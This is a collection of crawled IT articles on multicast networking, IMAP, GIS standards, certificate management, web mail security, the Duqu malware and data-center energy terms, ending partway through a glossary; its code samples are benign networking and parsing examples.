In KVM extension applications where you want to distribute HD video across a network, you need to understand how it works and what kind of networking equipment to use with your extenders. Think of your network as a river of data with a steady current of data moving smoothly down the channel. All your network users are like tiny tributaries branching off this river, taking only as much water (bandwidth) as they need to process data. When you start to multicast video, data, and audio over the LAN, those streams suddenly become the size of the main river. Each user is then basically flooded with data, and it becomes difficult or impossible to do any other tasks. This scenario of sending transmissions to every user on the network is called broadcasting, and it slows down the network to a trickle. There are network protocol methods that alleviate this problem, but it depends on the network switch you use.

Unicast vs. multicast, and why a typical Layer 2 switch isn't sufficient

Unicasting is sending data from one network device to another (point to point); in a typical unicast network, Layer 2 switches easily support these types of communications. But multicasting is transmitting data from one network device to multiple users. When multicasting with Layer 2 switches, all attached devices receive the packets, whether they want them or not. Because a multicast packet is addressed to a group rather than to a single destination device, an average network switch (a Layer 2 switch without multicast-aware capabilities) will not know which ports should receive it. So the switch sends the packet out to every network port on all attached devices. When the client or network interface card (NIC) receives the packet, it analyzes it and discards it if not wanted.

The solution: a Layer 3 switch with IGMPv2 or IGMPv3 and packet forwarding

Multicasting with Layer 3 switches is much more efficient than with Layer 2 switches because the switch identifies the multicast packet and sends it only to the intended receivers. A Layer 2 switch sends the multicast packets to every device and, if there are many sources, the network will slow down because of all the traffic. And, without IGMPv2 or IGMPv3 snooping support, the switch can handle only a few devices sending multicast packets. Layer 3 switches with IGMP support, however, "know" who wants to receive the multicast packet and who doesn't.

When a receiving device wants to tap into a multicast stream, it responds to the multicast broadcast with an IGMP report, the equivalent of saying, "I want to connect to this stream." The report is only sent in the first cycle, initializing the connection between the stream and the receiving device. If the device was previously connected to the stream, it sends a grafting request to remove the temporary block on the unicast routing table. The switch can then send the multicast packets to newly connected members of the multicast group. Then, when a device no longer wants to receive the multicast packets, it sends a pruning request to the IGMP-supported switch, which temporarily removes the device from the multicast group and stream.

Therefore, for multicasting, use routers or Layer 3 switches that support the IGMP protocol. Without this support, your network devices will be receiving so many multicast packets that they will not be able to communicate with other devices using different protocols, such as FTP.
Plus, a feature-rich, IGMP-supported Layer 3 switch gives you the bandwidth control needed to send video from multiple sources over a LAN.
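The IGMP join described above is something an application triggers implicitly: when a receiver subscribes to a multicast group, the operating system sends the IGMP membership report on its behalf, and an IGMP-aware switch uses that report to forward the stream only where it was requested. The snippet below is a minimal, generic multicast receiver in Python; the group address and port are arbitrary placeholders, not values from any particular KVM or video product.

```python
import socket
import struct

GROUP = "239.1.1.1"   # placeholder group in the administratively scoped multicast range
PORT = 5004           # placeholder UDP port

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", PORT))

# Joining the group is what causes the OS to emit an IGMP membership report,
# which an IGMP-capable (Layer 3 or snooping) switch uses to forward the stream
# only to the ports that asked for it.
mreq = struct.pack("4s4s", socket.inet_aton(GROUP), socket.inet_aton("0.0.0.0"))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

try:
    while True:
        data, src = sock.recvfrom(65535)
        print(f"{len(data)} bytes of multicast payload from {src}")
except KeyboardInterrupt:
    # Dropping membership is the application-level counterpart of the
    # "pruning" step described above.
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP, mreq)
    sock.close()
```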
Many of us—especially users of the Start Menu-less Windows 8—use the Windows taskbar as a quick launch bar, populating it with our day-to-day programs. Opening those programs is as simple as clicking them, but there's actually a faster way to launch software on your taskbar: simple keyboard combinations. Every program to the right of the Start button is assigned its own numerical shortcut, with the first program being "1," the second being "2," and so on, all the way to the 10th taskbar shortcut, which gets "0." Pressing the Windows key plus the number of the program you want to open launches it. For example, if Chrome is the third program pinned to your taskbar, pressing Win + 3 launches it.
Standards are key to the interoperability and wider use of geographic information systems technology. With so much, and such disparate, geospatial and location information available, standards are what allow GIS services to work together. The Open GIS Consortium, an international standards body comprising 258 companies, government agencies and universities, aims to address these connectivity issues. Founded in 1994, the Open GIS Consortium has a membership that includes organizations such as Mitre Corp., the United Nations and Harvard University. The city and county of San Francisco, which became a member last year, was one of the first to join as a local government associate member.

Historically built as stand-alone applications, GIS services weren't made to easily communicate with other applications and systems. The standards developed by the Open GIS Consortium, called OpenGIS Specifications, support interoperability with open interfaces and protocols. As with many standards bodies, the Open GIS Consortium has been working with Web services and XML. In February, the organization released an approved GML (Geography Markup Language) Version 3.0 implementation specification. GML, an XML grammar written in XML Schema for the modeling, transport and storage of geographic information, provides a variety of object types for describing geography. In April, the Open GIS Consortium issued a public call for comment on the proposed OpenLS (OpenGIS Location Services) implementation specification, which defines XML for location services.

The Open GIS Consortium has six guidelines for how geospatial information should be made available across any network, application or platform:

- Geospatial information should be easy to find, without regard to its physical location.
- Once found, geospatial information should be easy to access or acquire.
- Geospatial information from different sources should be easy to integrate, combine or use in spatial analyses, even when sources contain dissimilar types of data or data with disparate feature name schemas.
- Geospatial information from different sources should be easy to register, superimpose and render for display.
- Special displays and visualizations, for specific audiences and purposes, should be easy to generate, even when many sources and types of data are involved.
- It should be easy, without expensive integration efforts, to incorporate geoprocessing resources from many software and content providers into enterprise information systems.

More information on the Open GIS Consortium can be found at www.opengis.org.
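As a concrete illustration of the kind of encoding GML provides, the sketch below builds a single point geometry with Python's standard ElementTree module. It is a simplified, hypothetical fragment for illustration only; real GML documents are governed by the OpenGIS schemas and typically carry richer, application-specific feature types, so treat the namespace and attribute choices here as assumptions rather than a normative example.

```python
import xml.etree.ElementTree as ET

GML_NS = "http://www.opengis.net/gml"
ET.register_namespace("gml", GML_NS)

# A minimal GML-style point: a geometry element carrying a coordinate pair.
point = ET.Element(f"{{{GML_NS}}}Point", {"srsName": "urn:ogc:def:crs:EPSG::4326"})
pos = ET.SubElement(point, f"{{{GML_NS}}}pos")
pos.text = "37.7749 -122.4194"   # latitude longitude, purely illustrative

# Serializes to a gml:Point element containing a gml:pos coordinate pair.
print(ET.tostring(point, encoding="unicode"))
```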
IMAP (Internet Message Access Protocol) is a means of accessing e-mail. The protocol is also suitable for accessing bulletin board posts kept on a mail server, which may be shared. IMAP is an application layer protocol that allows an e-mail client to reach e-mail residing on a remote mail server. IMAP4 revision 1 is defined in RFC 3501. An IMAP server listens on port 143, while port 993 is allocated to IMAP over SSL (Secure Sockets Layer).

The key advantage of the IMAP protocol is its support for both online and offline modes of operation. IMAP's ability to access messages, whether new or saved, from multiple computers has turned out to be tremendously important for the reliability of electronic messaging. With IMAP, users can leave messages on the e-mail server and can delete them there as well. This is what allows more than one client to work with a single mailbox. Other goals connected with this protocol are:

- Full compatibility with internet messaging standards such as Multipurpose Internet Mail Extensions (MIME).
- Message access and management from multiple computers.
- Access without dependence on less efficient file-access protocols.
- Support for a disconnected access mode.

Here is some of the protocol's history. The original remote mailbox protocol, designed in 1986 by Mark Crispin as an alternative to POP, was the Interim Mail Access Protocol; it was implemented as a Xerox Lisp client and a TOPS-20 server. The next version was known as the Interactive Mail Access Protocol, or IMAP2 (RFC 1064); it was revised in 1990, and its updated description appears in RFC 1176. IMAP3 was published in 1991 as RFC 1203. IMAP2bis added support for MIME structures. The IMAP Working Group (IMAP WG), after taking responsibility for the IMAP2bis design, decided to rename it IMAP4, and the protocol's name became "Internet Message Access Protocol" with that version. IMAP4rev1 is designed to be upward compatible with IMAP2 and is the most widely supported IMAP4 protocol version.

Commonly used IMAP commands, with their references:

- APPEND (RFC 3501, 3502, 4466 and 4469)
- AUTHENTICATE (RFC 3501)
- CHECK (RFC 3501)
- COMPARATOR (RFC 5255)
- COPY (RFC 3501)
- CREATE (RFC 3501, 4466)
- DELETE (RFC 3501)
- FETCH (RFC 3501, 4466)
- GETMETADATA (RFC 5464)

The protocol includes operations for creating, removing and renaming mailboxes. Beyond that, checking for new messages, setting flags, clearing flags, searching and similar tasks are all performed efficiently. Concurrent access to shared mailboxes is supported, and the client software requires no knowledge of the server's file store layout.
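Python's standard imaplib module speaks this protocol directly and maps closely onto the commands listed above (SELECT, SEARCH, FETCH, and so on). The sketch below is a generic illustration; the host name and credentials are placeholders, not a real account.

```python
import imaplib

HOST = "mail.example.com"                  # placeholder IMAP server
USER, PASSWORD = "user", "app-password"    # placeholder credentials

# Port 993: IMAP over SSL, as noted above (plain IMAP uses port 143).
imap = imaplib.IMAP4_SSL(HOST, 993)
imap.login(USER, PASSWORD)

# SELECT a mailbox; the same account could be opened from several clients.
imap.select("INBOX")

# SEARCH for unread messages, then FETCH a couple of header fields from each.
status, data = imap.search(None, "UNSEEN")
for num in data[0].split():
    status, msg_data = imap.fetch(num, "(BODY.PEEK[HEADER.FIELDS (FROM SUBJECT)])")
    print(msg_data[0][1].decode(errors="replace"))

imap.logout()
```

Because the messages stay on the server (FETCH with BODY.PEEK does not even mark them as read), the same mailbox can be examined from a desktop, a phone and a script like this one without the copies drifting apart.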
<urn:uuid:8ade354e-9c3e-44c9-8843-9fff4f1f3583>
CC-MAIN-2017-09
https://howdoesinternetwork.com/2012/imap
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00634-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939617
774
2.875
3
Every business and government is dependent upon cryptographic keys and certificates to provide trust for critical communications. These trust technologies underpin the modern world of business, establishing secure transactions and protecting access to confidential corporate data. Unlike before, when trust could be measured in terms of locks, safes and video cameras, trust today is established in such security technologies within the enterprise network that can’t be seen, only managed. As organizations adopt cloud computing and employee-owned devices have increased access to the corporate networks and sensitive information, the challenge of securing company data everywhere increases exponentially. Cryptographic keys and digital certificates establish trust in the enterprise, ensuring that corporate data remains secure whether accessed by the employee in the cube on the second floor or by an executive in a hotel room in Singapore. The attack vehicle When it comes to Advanced Persistent Threats (APTs), bad actors will take advantage of the trust gap – using any and every exploit that they can leverage to steal your organization’s data. They will look for the weakest link in your security systems and find the path of least resistance. Over the past several years, criminal organizations and individual bad actors have found that by taking advantage of poor key and certificate management practices that they can breach trust to infect systems with information-siphoning malware and in some cases even implant weaponized code that can inflict physical damage on facilities. All you have to do is look back at the past few years to realize the impact trust-based attacks have had on organizations. Organized groups have been using encryption keys and digital certificates to steal information for years, as they serve as perfect vehicles for sliding past defensive systems. Case in point: Stuxnet and Flame. These two well-known examples of malware took advantage of stolen and weak certificates. Why did the actors choose this method? Compromised certificates authenticated the malware on the network making it appear as if it was legitimate code. As a result, the infected operating systems allowed the installation of the malware without any warning. The certificate-based attack problem is ongoing and growing. In April, the Common Computing Security Standards (CCSS) forum has logged sixteen legitimate digital certificates associated with malware. In the grand scheme of things, this doesn’t sound too bad, but when you take into account that an average of 200,000 new malicious programs are found every day, the use of legitimate certificates becomes a very real problem that organizations aren’t ready to face. Cybercriminals have gone as far as setting up fake companies to deceive a public Certificate Authority (CA) into issuing legitimate certificates that could be used to distribute malware, as was the case with the Brazilian banking malware signed with a valid DigiCert certificate. Does this mean that trust-based technology is broken? Not quite. The root of the problem While each of the above exploits demonstrates the misuse of a digital certificate, it is not the technology that is the root of the failure but the proper controls over the technology. The cybercriminals behind these exploits understand that each unmanaged and unaccounted for cryptographic key and certificate deployed in an organization is a valuable asset ripe for exploitation. The problem is systemic, and the exposure is significant. 
Over half of all enterprises don’t know how many keys and certificates are in use, for instance. More than 60 percent of the organizations surveyed by Venafi at RSA 2013 would take a day or more to correct a CA trust compromise if they were attacked by digitally signed malware; it would take at least that long to respond to a compromised SSH key. Combine the inability to understand how trust is established with the incapacity to quickly respond when it breaks down, and you have the perfect environment for APTs and for sophisticated attackers to launch their exploits. The financial impact of these exploits can hardly be exaggerated. The average global 2000 organization must manage in excess of 17,000 encryption keys – and most of the time the keys are managed manually. The first step in self-defense is to know thyself. Your organization is fully exposed to trust exploits and the consequences of targeted and persistent attacks on intellectual property if it does not have a clear understanding of its key and certificate inventory. Cybercriminals can easily collect unencrypted data within the network, so internal data should be protected in the same manner as external data—by encryption. The lifecycle of all cryptographic keys should be securely managed with an enterprise key and certificate management solution. It’s no surprise that every organization surveyed by the Ponemon Institute for the 2013 Annual Cost of Failed Trust Report has had to respond to at least one attack on keys and certificates over the last two years. Nearly 60 percent of survey respondents at RSA 2013 stated that they were concerned about the issuance of certificates to mobile devices outside of IT control. The same percentage of respondents were also perturbed that system administrators, who are not necessarily security experts, were responsible for encryption keys and certificates. This situation can result in security breaches, unplanned outages, or audit and compliance failures. By enforcing longer key lengths, strong algorithms, frequent rotation of keys and short validity periods for certificates, you can increase your ability to reduce the threat surface. Only through automated management can you respond fast enough to a compromise and limit significant reputational and financial damage. With APTs leveraging trust technology weaknesses, it’s critical to have visibility into and control of enterprise key and certificate inventories. Cybercriminals understand that the easy targets are those organizations that have little visibility into their threat surface and cannot respond quickly. As an industry, we need to gain control over trust and plug the gap related to key and certificate-based exploits.
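One small, concrete step toward that visibility is simply enumerating the TLS endpoints an organization depends on and checking when their certificates expire. The sketch below does this with Python's standard library only; the host list is hypothetical, and a real inventory would also have to cover internal CAs, SSH keys and code-signing certificates.

```python
import socket
import ssl
from datetime import datetime, timezone

# Hypothetical inventory: replace with hosts your organization actually depends on.
HOSTS = ["www.example.com", "mail.example.com", "vpn.example.com"]

def cert_days_remaining(host: str, port: int = 443) -> int:
    """Return the number of days until the server certificate expires."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    expires = datetime.fromtimestamp(
        ssl.cert_time_to_seconds(cert["notAfter"]), tz=timezone.utc
    )
    return (expires - datetime.now(timezone.utc)).days

for host in HOSTS:
    try:
        days = cert_days_remaining(host)
        status = "RENEW SOON" if days < 30 else "ok"
        print(f"{host}: {days} days remaining ({status})")
    except (OSError, ssl.SSLError) as exc:
        print(f"{host}: could not retrieve certificate ({exc})")
```

A report like this is no substitute for an enterprise key and certificate management system, but it illustrates how little effort the first pass at visibility requires.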
<urn:uuid:033032d4-3f08-4237-9957-d2b498f251e3>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2013/05/27/plugging-the-trust-gap/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00634-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950549
1,142
2.625
3
What do field sales people, home teleworkers, medical personnel, and any one working remotely from a central site have in common? A need for up to the minute information. One of the most successful models for using the Internet for business is the information dissemination model. One of the most common method for business communication today is email. Email can be sent/received in many ways; pagers, cell phones, and the like. However, one email communication option that holds promise for increased and more timely information flow is web based email systems. However, many businesses choose to not deploy web mail due to perceived security risk of web based applications in general. More specifically, not wanting to increase the risk of exposing corporate mail systems to external threats. Viruses, spam, worms, and other malicious attacks and non-malicious events can bring email infrastructures to their knees. With recent government legislation in countries such as the U.S., email confidentiality has become a growing concern. So, what approaches are there for deploying web mail systems in a secure manner? What are the options for web mail deployment? Understanding how web mail system work can help in deciding if web mail systems can be securely deployed. Web Mail Security Goals Most web mail systems are designed using a multi-tiered architecture. Usually, a web server serves as a reverse proxy to a backend email server that actually services the users mail requests. Most web mail systems use a separate database to store the mail versus the user authentication information. The main security issues for web mail are: Identity management, privacy, data integrity and availability. Part of identity management is user authentication. User identity verification is important because without verifying the identity of sender or receiver identity theft can occur. Fortunately, many web mail systems support a wide range of authentication schemes. For example, web mail user authentication can be done using authentication protocols native to the mail server O/S or 3rd party authentication methods such RADIUS, LDAP or SecureID. Privacy has to do with keeping information from unauthorized exposure. The primary method for ensuring privacy is the use of cryptography. Various cryptographic schemes are in use today. PGP and S/MIME, both widely implemented in the form of browser plug-ins and/or integration API, are widely used and well understood. Both PGP and S/MIME encrypt the message itself. SSL and IPSec encrypt at lower levels of session and network layers. SSL is the more widely used security protocol for basic web mail. Data integrity has to do with protection from unauthorized modification of email. Data integrity can be preserved by cryptographic techniques such as hashing and signing of messages. PGP and S/MIME provide the facility of digitally signing messages in such a way that tampering with the data will result in missed matched message hash results. Availability involves ensuring that the web mail system is as accessible as possible. The use of redundant servers, load balancing and fail over, and server clustering are all common ways to increase the probability that the web mail system will be available at the right time. An added plus to redundancy is continuous availability even during maintenance windows. After a web mail user is positively identified and authorized the next step is to initiate retrieval of that users’ email. 
Using a set of stored procedures and scripts, the web server formats the user HTML requests so that the back end email server can serve up mail. The usual backend mail server includes Microsoft Exchange, Netware Mail or Lotus Notes. Each of these systems includes a web mail service that uses default ports of 80 for HTTP and 443 for HTTP/SSL. Most web mail policies require the use of HTTP over an encrypted channel such as Secure Sockets Layer (SSL) or Secure Shell protocol (SSH). In rare cases, the IP security (IPSec) is used as the secure communication channel for web mail systems. After the user has finished sending / receiving and viewing mail the user will either log out or simply close the web browser. What happens next is dependent on the specific session management design of the web mail solution. The Cookie Problem The issue with web mail session management is centered around how session cookies are managed. Session cookies are files containing information about the state of the session. The web mail server records this information in a text file and stores this file on the web mail user’s hard drive (web browser). The session cookie sometimes contains authentication information along with the usual information about such things as the last URL (page) that the user viewed. By design this makes it easier for the user to move from one page of mail to the next without having to re-authenticate for page change. The problem comes though when the user “logs off”. If the web mail system does not erase the session cookie stored on the users computer and if the user does not close their browser, an attacker can easily re-log in to the web mail system while impersonating the authorized user. Why does this happen? Because the session cookie, which contains in some cases the authentication information, is still cached in the browser. This is a major security flaw in the design of several web mail systems. How does this happen? 1. The attacker presses the “back” browser button, 2. The attacker is presented with the web mail logon dialog screen (if using standard HTTP authentication) 3. Attacker simply presses the “OK” button – Voila! The attacker is now logged in as the authorized user. This vulnerability alone is enough for many security conscious organization to not allow web mail access unless some countermeasure to the “log off” problem is deployed. Small wonder why web mail access requests are greeted with suspicion. Fortunately, there are countermeasures that are available to reduce risk of such attacks on web mail systems. Web Mail Security Approaches There are three ways that web mail security can be done: 1. Development In-house 2. Deploy a web mail Security technology/product 3. Outsource to 3rd party Many businesses refuse to deploy web mail due to concerns over security issues inherent to web based access to mail. Figure 1 highlights some of the issues that are, in fact, valid concerns. However, there are countermeasures that can be applied to mitigate most of the security issues. One such countermeasure is application knowledge. Having security minded development staffs who are properly trained in secure software development principles could minimize poor programming habits that introduce vulnerabilities into the web mail application. A resource to organization who are establishing secure programming standards include: Foundstone, or online training available from the International Webmasters Association IWA-HWG. 
Also, a well-written guide to secure application development can be found here. These resources can be used to establish a baseline of secure programming practices within an organization. The second approach is the use of security technology. Technology is available now that can be immediately deployed as a protective layer around a web mail infrastructure. Most of these products are based on the idea of a reverse proxy; the difference between products is the technology used to implement the reverse proxy functionality. For example, the IronMail email security appliance from CipherTrust uses a hardened version of Apache as the reverse proxy. The IronMail appliance features a protocol anomaly-based intrusion detection system built into the secure web mail application on the appliance. The IDS can detect several hundred known exploits unique to web mail, as well as classes of exploits such as buffer overflows, directory traversal, path obfuscation, and malformed HTTP requests. As an all-in-one approach to web mail security, few products do the job as well. Outsourced Web Mail Service A third approach to web mail security is an outsourced or hosted web mail service. Yahoo and MSN provide web mail access, but very few people using their services would rate them as 'secure'. Hence the need for a business-class level of secure web mail access provided by managed security service providers such as Co-Mail. The Co-Mail secure mail service, offered by Ireland-based NR Lab LTD, provides a web-based secure email service with a user interface that can be used by anyone. The Co-Mail security architecture makes this service a good choice for an organization of any size. Co-Mail allows a company to use its own or a Co-Mail-registered domain for mail routing. The service provides mail confidentiality, with cryptography based on OpenPGP and SSL. Other security features of this online email service include rudimentary anti-spam, file encryption, and strong user authentication via (optional) Rainbow iKey support. Through an administrative web interface, an admin can register for the service, set up new users, and perform other housekeeping tasks. From the admin interface, organizational email statistics such as near-immediate or historical user account activity can be viewed. The administrator can customize the look and feel for end users by uploading company logos, modifying the background header, and selecting header text color. In addition, a company can use its own domain name or become a subdomain of the Co-Mail service. Co-Mail can integrate into the end user's current email environment via downloadable proxy software called Co-Mail Express. Co-Mail Express is a lightweight software application that resides in the end user's desktop tray. Its job is to intercept mail directed to port 25 in order to encrypt/decrypt the messages. Although this feature is not mandatory, some may find it helpful if web-based mail interfaces are not their cup of tea. Once an end user logs into the service, the user can perform the usual email tasks such as sending and receiving mail. In addition, the user can encrypt/decrypt files for secure storage using the Encrypt/Decrypt option within the Co-Mail web interface or the Co-Mail Express interface. The user can also manage the address book, export the address book, turn anti-spam on or off, set up auto-reply texts and so on.
Although it is very easy to use for small to medium user communities, traditional large enterprises may be hesitant to outsource their entire email service to a third party. ISPs in particular may want to think seriously about this service's value to their customers. The service is worth a look due to potential cost savings in up-front setup and ongoing maintenance. Lower cost and implementation speed are two reasons a large enterprise may want to outsource its email system to Co-Mail. However, the strength of the security employed by the service provider is also a central concern. Technical details for Co-Mail are available here. Web mail is becoming more acceptable as security awareness increases. While security knowledge helps, management commitment is key to the development of in-house web mail solutions. There is a trend in the secure web mail technology sector toward the use of appliances that provide web mail protection and address other email infrastructure security objectives as well. The appliance approach simplifies management but still requires internal knowledge of how to handle web mail security. Service-based web mail reduces the up-front cost of self-deployment and ongoing management. Prefer service-based web mail providers that understand the threat environment of web mail and offer security and scalability that can respond to your business environment.
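As a practical footnote to the "log off" problem described earlier: whichever deployment approach is chosen, the core countermeasure is server-side session invalidation, so that a cookie replayed from the browser cache after logout no longer maps to a live session. The following is a framework-agnostic sketch of that idea in Python; the function names, cookie name and timeout value are illustrative, not taken from any particular web mail product.

```python
import secrets
import time

# Server-side session store: session id -> session data.
# The authoritative state lives here, not in the browser.
SESSIONS = {}
SESSION_TTL = 15 * 60  # idle timeout in seconds

def login(username: str) -> str:
    """Create a new server-side session and return its opaque identifier."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "last_seen": time.time()}
    return sid

def is_valid(sid: str) -> bool:
    """Accept a request only if the session exists and has not idled out."""
    session = SESSIONS.get(sid)
    if session is None:
        return False
    if time.time() - session["last_seen"] > SESSION_TTL:
        SESSIONS.pop(sid, None)
        return False
    session["last_seen"] = time.time()
    return True

def logout(sid: str) -> str:
    """Destroy the session on the server and tell the browser to drop the cookie."""
    SESSIONS.pop(sid, None)
    # Expiring the cookie is a courtesy; the pop() above is what actually
    # defeats the back-button re-login attack described in the article.
    return "Set-Cookie: webmail_sid=deleted; Max-Age=0; Secure; HttpOnly; Path=/"
```

Because is_valid() consults only the server-side store, pressing the browser's back button after logout simply yields a fresh login prompt.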
<urn:uuid:fa81197d-3336-40ae-b44a-390b71a8e421>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2004/01/27/secure-web-based-mail-services/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00334-ip-10-171-10-108.ec2.internal.warc.gz
en
0.921085
2,282
2.578125
3
A new version of the installer for "Son of Stuxnet" virus Duqu is a rare value. Not only does it include what is currently the hottest malware on the market, it uses a previously unknown vulnerability in the Windows kernel that accepts code executed elsewhere as having originated within the victim's machine. The variant was discovered by the CrySyS Lab at the Budapest University of Technology and Economics, which discovered the original version of Duqu – a virus that shares much of the same code that made Stuxnet so effective, but is designed as a remotely targeted spy rather than saboteur. It is housed within a Word document that, when opened, uses the kernel flaw to install Duqu and launch an attack, though Symantec researchers found this variant was designed to be installed only during eight days in August. Symantec also provided a schematic of the process Duqu follows to exploit the flaw and install itself. The remote-execution flaw makes Duqu more dangerous and better able to penetrate secure facilities because it allows infected machines to communicate with each other rather than directly with a command controller outside the firewall. Once installed in one machine, this version of Duqu spreads itself to other machines, using an encrypted file-sharing protocol to communicate with one machine that has a confirmed open link to the outside. In that way it can spread across many servers within a secure environment without tripping alarms designed to be on the lookout for viruses phoning home from every machine they infect. "Duqu creates a bridge between the network's internal servers and the C&C server. This allowed the attackers to access Duqu infections in secure zones with the help of computers outside the secure zone being used as proxies," according to Symantec's analysis. So far, according to Kaspersky Labs, Duqu infections have been recorded only in Sudan and Iran, though there is no obvious connection to Iran's nuclear program, which Stuxnet was designed to attack. Duqu is different from Stuxnet in that it is a framework within which a number of different drivers, modules and encryption methods can be used to attack weaknesses peculiar to a specific target. It is highly customizable, can accept uploads from its command-and-control servers of new drivers or modules to overcome obstacles, and has full access to the infected machine's registry, so its structure on one system may be changed completely from the pattern on another, according to Kaspersky's report. Original reports about the virus said it was set to end its own infection after 36 days; Kaspersky's results indicate even the length of time it infects a system is variable. There is no truth to the report – according to the overly credible, obviously naive researchers at security companies – that Duqu can actually manifest itself outside the computer, attack and absorb the mass of warm-blooded organisms, then take on their shape and mimic them until it gets the chance to attack again. Despite the huge number of Hollywood movies depicting this exact scenario – not to mention the 70-page scientific report disguised as a 1938 science-fiction-classic short story called Who Goes There by John W. Campbell – security researchers insist Duqu is simply a software construct of unusually clever design, apparently intended for industrial espionage. 
That seems like a huge waste of such something so creative, adaptable and diabolical, though – like using the power of invisibility to make sure your neighbors haven't torn the labels marked Do Not Remove On Pain of Law off their mattresses. I expect, even if it won't end up eating anyone, that we can look forward to a lot more creative mayhem and destruction from whoever wrote and directs Duqu. Unless it's the U.S. and Israeli governments, again, in which case it will stick with relatively dull things that bring limited confusion to the enemy, but only after extensive cost justification and IT-environmental impact statements. Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:67b27ba3-5592-4102-beae-78ef30ce6eaf>
CC-MAIN-2017-09
http://www.itworld.com/article/2736405/security/new-version-of-duqu-even-smarter-than-the-last---son-of-stuxnet--may-be-a-monster--not-a-virus.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00510-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951456
855
2.546875
3
The National Telecommunications & Information Administration (NTIA) has published an online guide to the wireless spectrum being used by federal agencies. Launched on April 11, Spectrum.gov gives readers a glimpse into how the federal government is using its allotment of wireless frequencies in the 225 MHz to 5 GHz bands. The new resource also provides a map showing what federal systems are using spectrum throughout the U.S. “Just as commercial broadband providers are facing growing demands for spectrum to fuel the explosion of new wireless devices, federal agencies’ demand for spectrum also is growing,” said Karl Nebbia, NTIA associate administrator, Office of Spectrum Management, in a blog post announcing the new website. “NTIA’s compendium shows agencies need spectrum for crucial tasks ranging from military flight testing to air traffic control to weather forecasting.” Each spectrum use report is categorized by sections of particular bandwidth. Links to each band lead to a .pdf document that gives an overview of the band, how the frequencies within it are allocated, current federal agency use, and where applicable, planned future use. The shrinking availability of wireless spectrum has been a hot topic over the past several years as more communications devices have entered the marketplace and need bandwidth to operate. The wireless industry has been pushing for release of more spectrum to accommodate private-sector demand. Nebbia indicated in his blog post that Spectrum.gov would be updated regularly, calling the site “an important resource” as the federal government looks to repurpose federal spectrum for commercial use.
<urn:uuid:b6b2a827-87d0-4409-9efb-87e7e145cf24>
CC-MAIN-2017-09
http://www.govtech.com/internet/NTIA-Launches-Wireless-Spectrum-Webpage.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00102-ip-10-171-10-108.ec2.internal.warc.gz
en
0.932276
316
2.625
3
You need to learn a whole new vocabulary when you start talking with your company's facilities team about lowering data-center energy use. If you thought IT acronyms were hard to remember, wait until you sit down with your facilities team to discuss your data center's electric bill. You need to learn a whole new vocabulary when you start talking about lowering the building's energy use. Here's a crib sheet of a dozen of the most commonly used energy terms and acronyms so you can learn the jargon for going green.
1. AC/DC
Yes, this is the name of Australia's greatest rock band, but it's also a key trend in data-center design. AC stands for alternating current, and DC stands for direct current. Leading-edge data-center designers are looking at power supplies based on DC power -- rather than today's AC power -- because DC power promises to be more energy efficient.
2. Carbon footprint
No relation to Sasquatch, although to corporate executives it can be an equally large and scary beast. A company's carbon footprint is the amount of CO2 emissions its operations produce. In setting goals to reduce their carbon footprint, many companies target their data centers because they consume 25% or more of the electric bill.
3. CFD
It sounds like the acronym for the Chicago Fire Department, but this version stands for computational fluid dynamics. CFD high-performance-computing modeling has been used for a long time in the design of airplanes and weapon systems. Now it's being applied to air flow in data centers for optimal air-conditioning design.
4. Chiller
This isn't what you drink at the beach on a hot day. Rather, it's a machine that uses chilled water to cool and dehumidify air in a data center. Of all the components of a data center's air conditioning system, this is the one that consumes the most amount of electricity -- as much as 33% of a data center's power.
5. Close-coupled cooling
This sounds like a technique that would come in handy on Valentine's Day. In fact, it's a type of data-center air-conditioning system that brings the cooling source as close as possible to the high-density computing systems that generate the most heat. Instead of cooling down the entire room, close-coupled cooling systems located in a rack cool the hot air generated by the servers in just that rack.
6. CRAC
This is not what you sometimes see when a plumber bends over, although it's pronounced the same way. We're talking about a computer-room air-conditioning system. CRAC units monitor a data center's temperature, humidity and air flow. They consume around 10% of a data center's power.
7. DCiE
This acronym has nothing to do with the nation's capital, although its pronunciation is similar. DCiE is the Data Center Infrastructure Efficiency metric (also called DCE for Data Center Efficiency). DCiE is one of two reciprocal metrics embraced by The Green Grid industry consortium; the other is Power Usage Effectiveness (PUE, below). (See "Two ways to measure power consumption.") DCiE shows the power used by a data center's IT equipment as a percentage of the total power going into the data center. A DCiE of 50% means that 50% of the total power used by a data center goes to the IT equipment, and the other 50% goes to power and cooling overhead. The larger the DCiE, the better.
8. kWh
Electric power is sold in units called kilowatt hours; 1 kWh is the amount of energy delivered in one hour at a power level of 1000 watts. This abbreviation for "kilowatt hour" is mostly used in writing rather than conversation.
9. PDU
The acronym PDU stands for power distribution unit, a device that distributes electric power. PDUs function as power strips for a data center and consume around 5% of the power in a typical center.
10. PUE
